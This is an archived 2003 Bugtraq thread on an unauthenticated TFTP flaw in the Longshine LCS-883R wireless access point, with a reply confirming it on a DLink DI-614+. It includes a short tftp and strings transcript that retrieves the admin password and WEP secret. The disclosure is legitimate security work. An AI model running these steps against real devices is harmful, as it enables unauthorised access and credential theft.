Bugtraq mailing list archives
Re: Longshine WLAN Access-Point LCS-883R VU#310201
From: heydowns () borg com
Date: Mon, 6 Jan 2003 13:57:52 -0500 (EST)
This vulnerability is also an issue on the popular DLink DI-614+ (which I think is based upon the Longshine product). I was able to grab config.img and also extract the "admin" password from it. This was confirmed with firmware version 2.03 dated 9/10/2002. On the DLink product, you can only perform this from the "LAN-side" of the device in the default configuration. DLink has version 2.10 available, dated 11/25/2002, but I have not tried it yet. -Jeff On Mon, 6 Jan 2003, Lukas Grunwald wrote:
Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc. Description: Get Superuser Privileges and view the devices password and password and other passwords Versions affected: tested with 03.01.0b and 03.01.0h Vendor contacted: e-mailed Longshine at Sun Dec 29 Details: You are able to connect via tftp to the access-point an you can get download the configuration without authentication the WEP Secret for the encryption and the password from your radius server is also readable. In this configuration in the Username of the Superuser and the corresponding password stored. The WEP Secret for the encryption and the password from your radius server is also readable. This "attack" works via WLAN (!!!) and Ethernet. tftp tftp> connect 192.168.108.48 tftp> get config.img Received 780 bytes in 1.0 seconds tftp> quit [~]/-\>strings config.img DNXLABAP01 <- name of the AP root <- name of the superuser XXXXXX123 <- password from superuser DNXLABLAN <- ssid secu9 <- secret for WEP 7890abcdef <- You are also able to get the following files: config.img wbtune.dat mac.dat rom.img normal.img Solution: after contact with the vendor he claims that a new firmware-upgrade fixes this problem, but the latest available firmware on his web-page dosn't fix it anyway. Vendor-Contact: LONGSHINE Technologie (Europe) GmbH An der Strusbek 9 D-22926 Ahrensburg Tel: ++ 49 ( 0 ) 4102 / 4922- 0 Fax: ++ 49 ( 0 ) 4102 / 40109 support () longshine de
Current thread:
- Longshine WLAN Access-Point LCS-883R VU#310201 Lukas Grunwald (Jan 06)
- Re: Longshine WLAN Access-Point LCS-883R VU#310201 heydowns (Jan 06)